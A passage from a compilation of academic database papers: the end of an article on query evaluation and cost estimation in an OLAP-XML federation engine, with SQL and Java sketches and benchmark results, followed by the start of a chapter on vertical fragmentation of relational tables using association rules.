For a query plan without both cube selection and generalized projection operators, the following query which does not perform any aggregations in the OLAP component is used, because no OLAP data is required to be selected and aggregated (see Box 4). The SELECT INTO statement is executed in the temporary component, whereas the OPENQUERY function sends the SQL command to the OLAP component and returns the requested data to the outer SELECT INTO query, which then inserts the fact data into a temporary fact table. Therefore, cube selection and generalized projection operators are not evaluated against the OLAP cube until the fact-transfer operator is reached.
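A sketch of how the pass-through query of Box 1 could be assembled around the constructed OLAP query; the server and table names are placeholders, and the string handling is simplified.

// Wraps the OLAP query in SELECT ... INTO ... FROM OPENQUERY(...), repeating the
// aggregation in the outer query so that rows returned for the same grouping
// values are coalesced.
public class FactTransferQueryBuilder {

    static String buildPassThroughQuery(String olapServer, String tempTable,
                                        String aggregates, String levels, String innerOlapQuery) {
        return "SELECT " + aggregates + ", " + levels + "\n"
             + "INTO " + tempTable + "\n"
             + "FROM OPENQUERY(" + olapServer + ", '" + innerOlapQuery + "')\n"
             + "GROUP BY " + levels;
    }

    public static void main(String[] args) {
        // single quotes inside the inner query are doubled because OPENQUERY takes
        // the query as a T-SQL string literal
        String inner = "SELECT SUM(Quantity), Customer FROM TC "
                     + "WHERE Nation=''DK'' OR Nation=''UK'' GROUP BY Customer";
        System.out.println(buildPassThroughQuery("OLAP_SVR", "tmp_facts",
                "SUM(Quantity)", "Customer", inner));
    }
}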
Box 3.

SELECT    *
INTO      tmp_facts
FROM      OPENQUERY( OLAP_SVR,
          SELECT    SUM(Quantity), Customer, Nation
          FROM      TC
          WHERE     Nation=‘DK’ OR Nation=‘UK’
          GROUP BY  Customer, Nation)
Box 4.

SELECT    *
INTO      tmp_facts
FROM      OPENQUERY( OLAP_SVR,
          SELECT    *
          FROM      N )

Dimension Transfer

The dimension-transfer operator is basically a special fact-transfer operator that copies OLAP data into the temporary component. However, unlike the regular fact transfer, it only copies dimension values rather than the fact data. The query nested into the OPENQUERY function is a SELECT statement that retrieves the dimension values for the two levels lix and liy specified by ω[lix, liy]. The entire SELECT INTO query is in the following general form, where tmp_dimi is the temporary table's name. Note that the outer SELECT clause performs an additional DISTINCT operation on the data retrieved by the OPENQUERY function. This is due to the same reason as the additional GROUP BY clause in the query constructed by the fact-transfer operator. The extra DISTINCT operation ensures the correctness of the result (see Box 5).
Box 5.

SELECT    DISTINCT *
INTO      tmp_dimi
FROM      OPENQUERY( OLAP_SVR,
          SELECT DISTINCT  lix, liy
          FROM             N )

Decoration

A decoration operator δlz[SEM]/link/xp uses an SQL SELECT INTO statement to create a decoration dimension table, defined as RDn+1 in Definition 6, containing the data for the bottom level ⊥z and the middle level lxp of the decoration dimension. If the starting level lz of the level expression lz[SEM]/link/xp is the bottom level ⊥z, then the values of the two levels lxp and ⊥z are the data yielded by the level expression through an XML-transfer operator, τlz[SEM]/link/xp, which loads the data for lz and lxp as defined in Definition 5. In this case, the table Rτlz[SEM]/link/xp is used directly as the decoration dimension table. If lz ≠ ⊥z, then the table Rω[⊥z, lz] created by the dimension-transfer operator ω[⊥z, lz] must be used to join with the XML-transfer table. Therefore, the following SQL query is used, where tmp_dimxp is the decoration dimension table.

SELECT    ⊥z, lxp
INTO      tmp_dimxp
FROM      Rτlz[SEM]/link/xp AS R1, Rω[⊥z, lz] AS R2
WHERE     R1.lz = R2.lz

Federation Selection

As shown in Example 6, a federation selection operator uses an SQL SELECT query to filter the facts in the temporary fact table. Since a federation selection operator does not change the fact types, the SELECT clause selects all the columns using the "*" expression. A new temporary table is specified by the INTO clause with the table name. When data in dimension tables (including the decoration dimension tables) are involved in the select condition, as in Example 6, the tables containing the requested data must be joined with the temporary fact table, yielding the WHERE clause containing the join predicates and the selection predicate θ. The SQL query for a federation selection σθ is shown next, where R1 is the temporary fact table, and lR1Ri is the common attribute of the tables R1 and Ri.

SELECT    *
INTO      tmp_fact
FROM      R1, ..., Rn
WHERE     R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn AND θ

If the predicate θ references a regular dimension level liy higher than the level lix from the same dimension in the temporary fact table, a temporary dimension table Ri(lix, liy) created by the dimension-transfer operator ω[lix, liy] is required. In this case, lR1Ri is the lower level lix, which exists in both R1 and Ri. If Rj(⊥z, lxp) is a decoration dimension table created by the decoration operator δlz[SEM]/link/xp, and if the level expression lz[SEM]/link/xp is referenced by θ, then lR1Rj is ⊥z, which also exists in the fact table and represents the bottom level of the decoration dimension. If no roll-up or level expressions are involved in the selection, then n = 1, meaning that the selection can be performed directly on the temporary fact table.

Federation Generalized Projection

A federation generalized projection operator also is implemented using an SQL SELECT statement. Similar to the query constructed for a federation selection, the FROM clause also contains the tables holding the data requested by the generalized projection operator. The only difference is that the WHERE clause is not needed, but the arguments of the SELECT clause are, instead, the levels and aggregate functions specified by the parameters. The general form of the query for the operator ΠFed[L] is shown next, where F(M) represents the aggregate functions on the specified measures, and L are the levels to which the cube is aggregated. The participating tables R1, ..., Rn are the same as defined for the federation selection operator.

SELECT    F(M), L
INTO      tmp_fact
FROM      R1, ..., Rn
WHERE     R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn
GROUP BY  L

To reduce the temporary intermediate tables, we try to evaluate the SQL queries in batch-mode or to combine them into one, although each SQL query constructed by a federation selection or a generalized projection operator in a plan is itself executable against the existing temporary tables. For example, when a query constructed for a federation selection is returned to the federation generalized projection operator above it, the WHERE clause is taken out and combined with the WHERE clause of the query for the generalized projection, and all the tables required by the two operators are included in the FROM clause. The general form for such two operators is ΠFed[L](σFed[θ](Fext)), yielding the following:

SELECT    F(M), L
INTO      tmp_fact
FROM      R1, ..., Rn
WHERE     R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn AND θ
GROUP BY  L

If there is a federation selection operator σFed[θM] referencing aggregated measures above the federation generalized projection operator, the HAVING clause, HAVING θM, must be added to the previous query.

Example 10

In this example, we show how the physical plan in Figure 10 is evaluated step by step. Figure 13 shows (bottom-up) the operators in the order of execution and the items in the set TempTable during the evaluation.

Figure 13. Plan evaluation example

Before the evaluation starts, TempTable is empty, represented by the empty set at the bottom of the plan. The evaluation algorithm goes recursively down to the bottom of the plan tree and then evaluates the operators bottom-up. The first evaluated operator is the XML-transfer operator, τN[ANY]/Nl/P, which executes the INSERT INTO statement shown as follows.

INSERT INTO tmp_population
SELECT DISTINCT *
FROM   OPENXML(@hdoc, '/Nations/Nation', 2)
       WITH( NationName varchar(25),
             Population float)
WHERE  NationName IN ('DK', 'CN', 'UK')
Box 6.

SELECT    *
INTO      tmp_facts
FROM      OPENQUERY( OLAP_SVR,
          SELECT    SUM(Quantity), Brand, Nation
          FROM      TC
          WHERE     Nation=‘DK’ OR Nation=‘UK’
          GROUP BY  Brand, Nation)
The set TempTable then is updated with the first item TτN[ANY]/Nl/P, which is a two-tuple (Rτ, τN[ANY]/Nl/P), where the first element Rτ (shown in Table 5) is the temporary table, and the second is its creator, the operator τN[ANY]/Nl/P. In practice, a tuple T is implemented as a Java class containing (1) a string variable representing a table name or a query string, (2) an Operator object pointing at the creator, and (3) an integer specifying the type of the value assigned to the string (e.g., a table name or a query string). The table Rτ consists of the nation codes and their corresponding population data, which are used to rewrite the predicate N[ANY]/Nl/P < 30. After the inlining operator ιN[ANY]/Nl/P has rewritten the predicate, the evaluation continues bottom-up with the operators above it in the plan.
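A minimal sketch of such a tuple class, following the three fields described above; the Operator interface and the constant names are assumptions.

// Holds a table name or a query string, its creating operator, and a type tag.
public class TempTableEntry {

    public static final int TABLE_NAME = 0;
    public static final int QUERY_STRING = 1;

    interface Operator { }                 // stands in for the engine's operator class

    private final String value;            // a table name or a query string
    private final Operator creator;        // the operator that produced it
    private final int valueType;           // TABLE_NAME or QUERY_STRING

    public TempTableEntry(String value, Operator creator, int valueType) {
        this.value = value;
        this.creator = creator;
        this.valueType = valueType;
    }

    public String getValue() { return value; }
    public Operator getCreator() { return creator; }
    public int getValueType() { return valueType; }
}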
...
9)    subTreeCost = subTreeCost + tempCost;
10)   if an operator Op′ same as Op has not been estimated before
11)     return generateOpCost(Op) + subTreeCost;
12)   else
13)     return the cost of Op′ + subTreeCost;
14) }
The function returns the cost of the plan rooted at the operator Opi. Note that an optimization method is used at lines 10 and 11, such that the algorithm does not estimate the cost of an operator if the cost of an identical operator was estimated before. From the descriptions of the previous optimizer structure, we know that before the plan pruning phase, the enumerated plans from the first phase may contain the same operators. For example, the XML-transfer operator τN[ANY]/Nl/P in the physical plan in Figure 10 is always required by any physical plan to load the XML decoration
values. Therefore, when the physical plans for all the enumerated logical plans are cost-estimated, the cost of operators like τN[ANY]/Nl/P, which exist in many plans and have exactly the same parameters, needs to be estimated only once, at the operator's first appearance. The function generateOpCost estimates the cost of the input operator and registers it in a hash table; therefore, later, when an identical operator is reached, an entry for the operator can be found in the hash table, and its cost can be used directly. For example, the cost estimation process for the physical plan in Figure 10 starts from the XML-transfer operator after the algorithm first goes down to the bottom. Since all the operators are on the same branch, the costs of the operators are accumulated as the cost estimation algorithm moves up to the top. Therefore, the cost of the plan is the sum of the costs of all the operators.
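A small sketch of this memoization, where an operator's cost is computed once by generateOpCost-style logic and cached under a key describing the operator and its parameters; the key format and types are illustrative.

import java.util.HashMap;
import java.util.Map;
import java.util.function.ToDoubleFunction;

// Caches operator costs so identical operators in other plans reuse the stored value.
public class OperatorCostCache {

    private final Map<String, Double> costByOperatorKey = new HashMap<>();

    /** Returns the cached cost, or estimates and registers it on first appearance. */
    double costOf(String operatorKey, ToDoubleFunction<String> generateOpCost) {
        return costByOperatorKey.computeIfAbsent(operatorKey,
                k -> generateOpCost.applyAsDouble(k));
    }

    public static void main(String[] args) {
        OperatorCostCache cache = new OperatorCostCache();
        // e.g., the cost of an XML-transfer operator = transfer rate * data size, estimated once
        ToDoubleFunction<String> generateOpCost = key -> {
            System.out.println("estimating " + key);
            return 135.0;
        };
        cache.costOf("xml-transfer:N[ANY]/Nl/P", generateOpCost);
        cache.costOf("xml-transfer:N[ANY]/Nl/P", generateOpCost); // no second estimation
    }
}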
Cost Estimation of Operators

In the current implementation, the cost of a physical operator is approximately the execution time of its evaluation method introduced earlier. The costs are rough estimations but effective enough to support the choice of the relatively cheapest plan. The cost of an XML-transfer operator is approximated as the product of the XML-to-relational data transfer rate and the size of the data to be loaded into the temporary component. Similarly, the cost of a dimension-transfer operator is the product of the size of the dimension values and the OLAP-to-relational data transfer rate. For an inlining operator, the construction of the new predicate is performed in memory, which takes a relatively trivial amount of time compared to I/O operations. Therefore, the cost of an inlining operator is approximately the time for performing lines 6, 11, or 15 of the transforming function in Figure 12 for the respective forms of the input predicate (i.e., the time for loading the required data from the temporary component into memory, which is the product of the size of the required data and the relational-to-memory transfer rate).
The cost parameters (e.g., the transfer rates) are estimated through probing queries (Zhu & Larson, 1996) and stored as constants in metadata. Later, in a more advanced implementation, a dynamic statistics manager can be used to pose the inexpensive probing queries when the system load is low in order to determine the cost parameters. The cube operators, as described earlier, do not perform any operations against the real data except for constructing OLAP component queries, which is trivial in terms of execution time. The fact-transfer operator executes the constructed query; therefore, the fact-transfer operator's cost shall include the processing time for the OLAP query. However, experiments have shown that the cost is spent mostly on data transfer between the temporary and the OLAP components for the fact-transfer operators using the pass-through queries. Therefore, the cost of the fact-transfer operator is estimated as the data transfer time in a similar way to the XML-transfer operators, except that the size of the fact data to be transferred must first be estimated through the cube selection and generalized projection operators in the plan. The size of the fact data to be transferred is approximately the product of (1) the size of the original cube, which is approximately the size of the fact table; (2) the selectivity ratio of the cube selection; and (3) the roll-up fraction of the cube generalized projection, which is estimated by dividing the number of the distinct tuples after the projection by the original number of facts (Shukla, Deshpande, Naughton, & Ramasamy, 1996). For the case where no cube operators exist in a physical plan, the cost of a fact-transfer operator is the size of the original fact table divided by the OLAP-to-relational data transfer rate. The federation selection and generalized projection operators are implemented through SQL queries. Therefore, the cost of these operators is estimated as the cost of the composing SQL operations through the methods described in Elmasri and Navathe (2000) and in Silberschatz, Korth, and Sudarshan (2002). In the following, we present the experimental results in order to show the performance of the federation query engine with the previous technologies.

PERFORMANCE STUDY

The experiments were performed on a machine with an Intel Pentium III 800MHz CPU, 512MB of RAM, 30 GB of disk, and a 4096MB page file. The OS is Microsoft Windows 2000 Server with SP4. The example cube used in the experiments is shown in Figure 1. The cube is based on about 100MB of data generated using the TPC-H benchmark. The following experiments observe the federation with respect to the effectiveness of the federation system.
Figure 16. Comparisons of the queries involving the federated, cached, or integrated 11.4MB XML data

Figure 17. Comparisons of the queries involving the federated or integrated 2KB XML data

Thus, we compare the
performance when the external XML data is (1) in the XML component (federated), (2) in the local relational temporary component (cached), and (3) physically integrated in the OLAP cube itself (integrated). The performance of 16 different query types was measured. The query types all aggregate fact data but vary in (a) whether one or two dimensions is used in the query, (b) which dimensions are used, and (c) which levels in these dimensions are used. Two different XML documents were used: a large 11.4-MB document about orders and their priorities and a small 2-KB document about nations and their populations, both generated from the TPC-H benchmark. For the small document, the WHERE clause has a 10% selectivity. For the large one, the WHERE clause has a 0.1% selectivity. The selectivity does not affect the relative performance of the queries on the federated, cached, and integrated data originating from the same XML document, as long as the same selectivity is used. The bar charts in Figures 16 and 17 show the performance of the queries using the federated, cached, or integrated XML data. The X axis represents the query type, and the Y axis represents the execution time in seconds. As Figure 16 indicates, the cost of querying the federation exceeds the cost of querying the physical integration by a factor of 10 to 20. The Cached bars stay in between but much closer to the Integrated. The queries involving federated XML data are evaluated in three sequential tasks. First, load the XML data into the temporary component and rewrite the predicate. Second, perform the selection and aggregation in the OLAP component and then load the values into the temporary component. Third, generate the final result in the temporary component. The first task takes much more time (about 135 seconds) so the other two are relatively trivial. Therefore, the queries on federations seem to take approximately the same evaluation time. The queries involving cached XML data skip the
first part of the first task and rewrite the predicates using the cached XML data, thereby boosting the execution speed. The queries referencing the dimension values that are the integrated XML data skip the first step and thereby are evaluated mostly in the OLAP component. The chart in Figure 17 demonstrates comparisons of queries on two other federated/integrated levels. The chart suggests that querying the logical federation with a virtual dimension has almost the same performance as on the physically integrated cube, when the amount of the XML data is small (i.e., a few kilobytes). Therefore, a federation involving such XML data can be queried just as if it were a local cube. However, when the XML documents grow larger and larger, retrieving XML values is becoming the bottleneck for processing the federation queries. Experiments have shown that the performance can be improved by caching the external data; that is, the XML data can be stored in relational tables, thereby reducing the time for decorating the cube for the queries using these data. Based on the strategies proposed by Pedersen et al. (2004) in handling external XML data sources under different circumstances, the cached XML data can be used by queries and can provide efficient access to external data for analysis, when, for example, the data is not out of date. In summary, the federation is good for a small amount of XML data. However, more efficient query performance can be gained by caching the external data locally, which will become the most common case in the applications of OLAP-XML federations. All in all, the logical approach can be a practical alternative for flexible online analysis involving external fast-changing data.
CONCLUSION AND FUTURE WORK

Current OLAP systems have a common problem in physically integrating fast-changing data. As
external data most often will be available in XML format, a logical integration of OLAP and XML data is desirable. In this article, we present a robust OLAP-XML federation query engine with (1) a simplified logical query semantics yielding more compact and concise logical query plans for OLAP-XML federation queries; (2) a set of physical operators to model the actual query execution tasks precisely; (3) the query evaluation, including the adopted relational, multi-dimension database and XML techniques, component query construction and evaluation algorithms for physical operators and query plans; (4) query optimization, including the architecture of the optimizer and cost estimation of physical operators and plans; and (5) a performance study showing the effectiveness of our approach. We believe that we are the first to implement a robust query engine that analyzes, optimizes, and evaluates XML-extended OLAP queries. Also, we believe this article to be the first to describe the query evaluation of these queries, including the detailed techniques and algorithms. Future work will be focused on improving the query engine by developing more advanced query optimization techniques, cost estimation techniques, and query evaluation techniques (e.g., a more efficient search algorithm for query enumeration, more accurate cost formulas, and more efficient OLAP and XML data loading techniques). Furthermore, we will integrate the improved federation query engine into the business analysis products of a BI tool vendor: TARGIT.
ACKNOWLEDGMENT This work was supported by the Danish Technical Research Council under grant no. 26-02-0277.
REFERENCES Bae, K. I., Kim, J. H., & Huh, S. Y. (2003). Federated process framework in a virtual enterprise using an object-oriented database and extensible markup language. Journal of Database Management, 14(1), 27-47. Chawathe, S., Garcia-Molina, H., Hammer, J., Ireland, K., Papakonstantinou, Y., Ullman, J. D., et al. (1994, October). The TSIMMIS project: Integration of heterogeneous information sources. In Proceedings of IDS of Japan (pp. 7-18), Tokyo, Japan. Clark, J., & DeRose, S. (2005). XML path language (XPath). Retrieved May 10, 2005, from http://www.w3.org/TR/xpath Elmasri, R., & Navathe, S. B. (2000). Fundamentals of database systems. Menlo Park, CA: Addison-Wesley. Graefe, G. (1993). Query evaluation techniques for large databases. ACM Computing Surveys, 25(2), 73-170. Graefe, G., & McKenna, W. J. (1993, April 19-23). The volcano optimizer generator: Extensibility and efficient search. In Proceedings of ICDE (pp. 209-218), Vienna, Austria. Goldman, R., & Widom, J. (2000, May 16-18). WSQ/DSQ: A practical approach for combined querying of databases and the Web. In Proceedings of SIGMOD (pp. 285-296), Dallas, Texas, USA. Gu, J., Pedersen, T. B., & Shoshani, A. (2000, September 10-14). OLAP++: Powerful and easyto-use federations of OLAP and object databases. In Proceedings of VLDB (pp. 599-602), Cairo, Egypt. Hellerstein, J. M., Stonebraker, M., & Caccia, R. (1999). Independent, open enterprise data integration. IEEE Data Engineering Bulletin, 22(1), 43-49.
IBM. (n.d.). Datajoiner. Retrieved May 10, 2005, from http://www-306.ibm.com/software/data/datajoiner
Lahiri, T., Abiteboul, S., & Widom, J. (1999, September 1-3). Ozone — Integrating semistructured and structured data. In Proceedings of DBPL (pp. 297-323), Kinloch Rannoch, Scotland.
Lenz, H., & Shoshani, A. (1997, August 11-13). Summarizability in OLAP and statistical data bases. In Proceedings of SSDBM (pp. 39-48), Olympia, Washington, USA.
Microsoft. (2002a). Passing queries from SQL server to a linked analysis server. Books Online, version 5.2.3790. Retrieved November 3, 2005, from http://msdn.microsoft.com/library/default.asp?url=/library/en-us/olapdmpr/prsql_4vxv.asp
Microsoft. (2002b). Performing bulk load of XML data. Retrieved May 10, 2005, from http://msdn.microsoft.com/library/en-us/sqlxml3/htm/bulkload_7pv0.asp
Microsoft. (2005a). COM: Component object model technologies. Retrieved May 10, 2005, from http://www.microsoft.com/com
Microsoft. (2005b). Supported SQL SELECT syntax. Retrieved May 10, 2005, from http://msdn.microsoft.com/library/default.asp?url=/library/en-us/olapdmpr/prsql_70e0.asp
Nicolle, C., Yétongnon, K., & Simon, J. C. (2003). XML integration and toolkit for B2B applications. Journal of Database Management, 14(4), 33-58.
Oracle. (2005). Gateways. Retrieved May 10, 2005, from http://www.oracle.com/gateways
Pedersen, D., Pedersen, J., & Pedersen, T. B. (2004, March 30-April 2). Integrating XML data in the TARGIT OLAP system. In Proceedings of ICDE (pp. 778-781), Boston, Massachusetts, USA.
Pedersen, D., Riis, K., & Pedersen, T. B. (2002, July 24-26). XML-extended OLAP querying. In Proceedings of SSDBM (pp. 195-206), Edinburgh, Scotland.
Pedersen, T. B., Shoshani, A., Gu, J., & Jensen, C. S. (2000, November 6-11). Extending OLAP querying to external object databases. In Proceedings of CIKM (pp. 405-413), McLean, Virginia, USA.
Shukla, A., Deshpande, P., Naughton, J. F., & Ramasamy, K. (1996, September 3-6). Storage estimation for multidimensional aggregates in the presence of hierarchies. In Proceedings of VLDB (pp. 522-531), Bombay, India.
Silberschatz, A., Korth, H. F., & Sudarshan, S. (2002). Database system concepts. New York: McGraw-Hill.
Transaction Processing Performance Council. (2004). TPC-H. Retrieved May 10, 2005, from http://www.tpc.org/tpch
Triantafillakis, A., Kanellis, P., & Martakos, D. (2004). Data warehouse interoperability for the extended enterprise. Journal of Database Management, 15(3), 73-84.
Yin, X., & Pedersen, T. B. (2004, November 12-13). Evaluating XML-extended OLAP queries based on a physical algebra. In Proceedings of DOLAP (pp. 73-82), Washington, DC.
Zhu, Q., & Larson, P. A. (1996, September 25-27). Global query processing and optimization in the CORDS multidatabase system. In Proceedings of PDCS (pp. 640-646), Dijon, France.
This work was previously published in the Journal of Database Management, edited by K. Siau, Volume 17, Issue 2, pp. 85-116, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 8.9
Vertical Fragmentation in Databases Using Data-Mining Technique
Narasimhaiah Gorla, American University of Sharjah, UAE
Pang Wing Yan Betty, Hong Kong Polytechnic University, Hong Kong
ABSTRACT A new approach to vertical fragmentation in relational databases is proposed using association rules, a data-mining technique. Vertical fragmentation can enhance the performance of database systems by reducing the number of disk accesses needed by transactions. By adapting Apriori algorithm, a design methodology for vertical partitioning is proposed. The heuristic methodology is tested using two real-life databases for various minimum support levels and minimum confidence levels. In the smaller database, the partitioning solution obtained matched the optimal solution using exhaustive enumeration. The application of our method on the larger database resulted in the partitioning solution that has an improvement of 41.05% over unpartitioned solution and took less than a second to produce the solution. We
provide future research directions on extending the procedure to distributed and object-oriented database designs.
INTRODUCTION Vertical fragmentation (or partitioning) is a physical database design technique that is aimed at improving the access performance of user transactions. In vertical partitioning, a relation is split into a set of smaller physical files, each with a subset of the attributes of the original relation. The rationale is that database transactions normally require access only to subset of the attributes. Thus, if we can split the relation into sub files that closely match the requirements of user transactions, the access time for transactions reduces significantly.
The fragmentation problem is computationally complex. Consider a relational schema with N relations, with Ai attributes for relation i. A relation with A attributes can be partitioned in B(A) different ways (Hammer & Niamir, 1979), where B(A) is the Ath Bell number (for A = 30, B(A) ≈ 8.5 × 10^23). Using exhaustive enumeration, the number of possible fragmentations for the N-relation schema is approximately B(A1)B(A2) ... B(AN). Yu, Chen, Heiss, and Lee (1992) found that the numbers of attributes for base tables and views in a typical relational environment are 18 and 41, respectively. Even if we consider a small schema of 10 relations with 15 attributes per relation, the number of possible fragmentations is approximately (10^9)^10 = 10^90. Since the problem is intractable, solving large problems requires the use of heuristic techniques. The objective of this research is to provide a general approach for vertically fragmenting a relation. Since the problem is computationally intractable, we use a heuristic procedure to solve the problem using association rules. Our approach is based on the Apriori algorithm developed by Agrawal and Srikant (1994). We believe that "association rules" provide a natural way to represent the linkage between attributes as implied by the database transactions, thus providing a convenient way of solving the problem. Though several authors have studied the vertical partitioning problem in databases, there is no study that has employed an association-rules approach. The objective of the research is to develop a methodology for attribute partitioning with the least database operating cost, given the characteristics of relations and database transactions. The application of our algorithm using a standard database workload (Yu et al., 1992) on a large database resulted in an improvement of 41% over the unpartitioned solution. Our association-rules-based algorithm took only a few seconds to produce the solution, since it is relatively less complex compared to other approaches. Furthermore, the application of our methodology
on small problems yielded optimal solutions as obtained by exhaustive enumeration. The organization of the article is as follows. Section 2 provides related research in database partitioning. Section 3 provides background on association rules. Section 4 has the methodology for vertical partitioning using association rules. Section 5 contains experiments using the proposed method employing two real life data sets for various support and confidence levels. Section 6 has discussion on effectiveness of the proposed method. Section 7 deals with discussion of results and section 8 contains future research directions.
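To make the scale of this search space concrete, the Bell numbers quoted above can be reproduced with the standard Bell-triangle recurrence. The short Python sketch below is our own illustration and is not part of the original methodology; it simply prints the orders of magnitude used in the argument.

# Illustrative sketch (not from the original article): Bell numbers via the
# Bell triangle, showing how fast the number of possible vertical
# fragmentations B(A) of a relation with A attributes grows.

def bell(n):
    # Bell triangle: each new row starts with the last element of the
    # previous row; every following entry adds its left neighbour and the
    # entry above it. bell(n) is the first element of row n.
    row = [1]
    for _ in range(n):
        new_row = [row[-1]]
        for value in row:
            new_row.append(new_row[-1] + value)
        row = new_row
    return row[0]

for a in (5, 10, 15, 20, 30):
    print(f"B({a}) = {bell(a):.3e}")
# B(15) is about 1.4e9, so a 10-relation schema with 15 attributes per
# relation has roughly (1e9)**10 = 1e90 possible fragmentations.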
RELATED WORK IN VERTICAL PARTITIONING Because of the criticality of database performance, several researchers have contributed enormously to the vertical partitioning problem for over two decades. Database partitioning has been applied in centralized relational databases (Ceri, Navathe, & Wiederhold, 1983; Cornell & Yu, 1990; Hoffer & Severance, 1975; Ng, Gorla, Law, & Chan, 2003; Song & Gorla, 2000), distributed databases (Baiao et al., 2004; Cheng, Lee, & Wong, 2002; March & Rho, 1995; Ozsu & Valduriez, 1996), data warehouse design (Ezeife, 2001; Furtado, Lima, Pacitti, Valduriez, & Mattoso, 2005; Labio, Quass, & Adelberg, 1997), and object-oriented database design (Fung, Karlapalem, & Li, 2002; Gorla, 2001). Hoffer and Severance (1975) consider the vertical partitioning problem by applying the bond energy algorithm to the similarity of attributes, which is based on the access patterns of transactions. Their work was extended by Navathe, Ceri, Wiederhold, and Dou (1984) by presenting vertical partitioning algorithms for three contexts: a database stored on devices of a single type; in different memory levels; and a distributed database. They used af-
finity between attributes for partitioning, which is based on the number of disk accesses. An alternate graphical approach was proposed by Navathe and Ra (1989). Cornell and Yu (1990) use an optimal binary-partitioning algorithm to obtain vertical partitioning, which is iteratively applied to obtain more partitions. The study uses the number of data accesses to evaluate partitions. Chu and Ieong (1993) develop a transaction-based approach to vertical partitioning, in which the transaction rather than the attribute is used as the unit of analysis. Song and Gorla (2000) used genetic algorithms to obtain solutions for vertical partitions and access paths simultaneously. They also use the number of disk accesses as the partitioning evaluation criterion. Ailamaki, Dewitt, Hill, and Skounakis (2001) proposed the Partition Attributes Across (PAX) model to improve cache performance, while Ramamurthy, Dewitt, and Su (2002) proposed a fractured-mirrors partitioning scheme based on the Decomposition Storage Model and the N-ary Storage Model. Ng et al. (2003) propose a genetic-algorithm-based solution to the combined problem of vertical partitioning and tuple clustering in relational databases. There are also studies that use data partitioning in distributed databases, object-oriented databases, and data warehouse designs. For example, Cheng et al. (2002) use a genetic search-based clustering algorithm on the traveling salesman problem to obtain vertical partitions in distributed databases. With reference to object-oriented database design, Gorla (2001) used a genetic algorithm to determine the instance variables that should be stored in each class/subclass in a subclass hierarchy, so that the total cost of database operations is minimized. Fung et al. (2002) analyze vertical partitioning of classes/subclasses in object-oriented databases for the class composition hierarchy and the subclass hierarchy and develop the associated cost functions for query processing under the cases of large memory and small memory availability. Partitioning has been applied in data warehouses in order to optimize OLAP queries by designing parallel
database clusters (Furtado et al., 2005) and to generate ROLAP data cubes based on optimized data partitioning technique (Chen, Dehne, Eavis, & Rau-Chaplin, 2006). Methods for selecting and materializing horizontally partitioned data warehouse views have been proposed in order to speed up the query response time and reduce data warehouse maintenance costs (Ezeife, 2001). While present research provides an association rules based methodology to solve vertical partitioning problem in centralized relational databases, the article also provides extension to apply the methodology to distributed and objectoriented database designs.
RELATED WORK IN ASSOCIATION RULES Data mining is a process of extraction of implicit information from databases (Chen, Han, & Yu, 1996; Frawley, Piatetsky-Shapiro, & Matheus, 1991). Association rules are a data-mining technique (Agrawal & Srikant, 1994), the formal definition of which is given as follows (Agrawal, Mannila, Srikant, Toivonen, & Verkamo, 1996): "given a finite multiset of transactions D, the problem of mining association rules is to generate all association rules that have support and confidence at least equal to the user-specified minimum support threshold (min_sup) and minimum confidence threshold (min_conf) respectively" (Tzanis & Berberidis, 2007). In other words, association rules can be represented by an expression of the form X → Y, where X, Y are sets of items and X ∩ Y = ∅. The rule X → Y has a support of s if s% of transactions contain both X and Y. The rule X → Y has a confidence of c if c% of transactions (T) that contain X also contain Y. Thus, the confidence of the rule is Freq(X∩Y) / Freq(X). Confidence denotes the strength of implication, while support indicates the frequency of occurrence of the rule.
Several approaches have been devised to extract association rules, such as the Apriori algorithm (Agrawal & Srikant, 1994), DHP (Park, Chen, & Yu, 1995), a graph-based approach (Yen & Chen, 2001), itemset lattice structures (Zaki, 2000; Zaki & Hsiao, 2005), and multiple-level association rules (Han & Fu, 1999). Association rules have been applied in several contexts. For example, Bagui (2006) used association rules to determine crime patterns based on the datacubes created using Structured Query Language (SQL) on crime data obtained from a U.S. state. Tjioe and Taniar (2005) developed methods to extract association rules in data warehouses by focusing on aggregate data and applied their algorithms on repeatable and non-repeatable predicates. Tzanis and Berberidis (2007) propose a mining algorithm to discover association rules for mutually exclusive items (the presence of one item excludes the other) in transaction databases. While the previous works related to association rules provide some background, we derive association rules from the transactions and use those rules to design partitioning schemes in databases so that minimum database operating cost is incurred by the transactions. We develop the corresponding cost function in order to assess the merit of the database partitions obtained using our algorithm.
METHODOLOGY

Our methodology consists of three steps: estimating the transaction load, deriving the cost formulae for transaction execution in a partitioned environment, and an algorithm to obtain vertical data partitioning. Based on the workload characteristics of relational databases (Yu, Chen, Heiss, & Lee, 1992), we generate the transaction load for our research. While the workload of a typical database (Yu et al., 1992) has 75.9% SELECT, 4.7% DELETE, 7.7% UPDATE and 11.7% INSERT, the transaction set in our experiments closely match these percentages. The proportion of transactions that use 1-5, 6-10 and 11-15 attributes are around 65%, 24% and 11%, respectively. Furthermore, we consider basic predicate type since it is the most commonly used.

Cost Formula

The amount of data transferred and the number of disk accesses have been the most commonly used methods of evaluating partitioning schemes by previous researchers (e.g., Cheng et al, 2002; Cornell & Yu, 1990; Fung et al, 2002; Gorla, 2001). In our research, we do not include cost of index access and storage cost. We use the blocks estimate given in Yao (1977) as the basis for cost of query processing, in line with previous studies. If there are n records divided into m blocks and if k records satisfying a query are distributed uniformly among the m blocks, then the number of blocks accessed for the query is m(1 - (1 - 1/m)^k) (Yao, 1977). In the partitioned database, we apply this formula for each Segment_i accessed by the query q. Thus, the cost of processing a (retrieval) query q is estimated as shown in Box 1.

Box 1.

Cost(q) = freq_q \times \Bigl( \sum_{i=1}^{Segment_{qj}} \bigl\lceil M_i \bigl(1 - (1 - 1/M_i)^{k_q}\bigr) \bigr\rceil \Bigr) \times \bigl(1 + 0.1 \times (Segment_{qj} - 1)\bigr) \qquad (1)

where
Vertical Fragmentation in Databases Using Data-Mining Technique
freq_q = frequency of query q
Segment_qj = number of partitions required by the query q
M_i = \lceil T \times L_i / BS \rceil = number of blocks to be accessed in partition i
k_q = number of tuples satisfying the query q
T = total number of tuples
L_i = size of a partition i in bytes
BS = block size
The first part computes the total number of blocks to be accessed from each of the Segment_qj partitions. The second part indicates the overhead to concatenate Segment_qj partitions in the memory. Similarly, the cost of processing an insert/delete transaction q is estimated as:

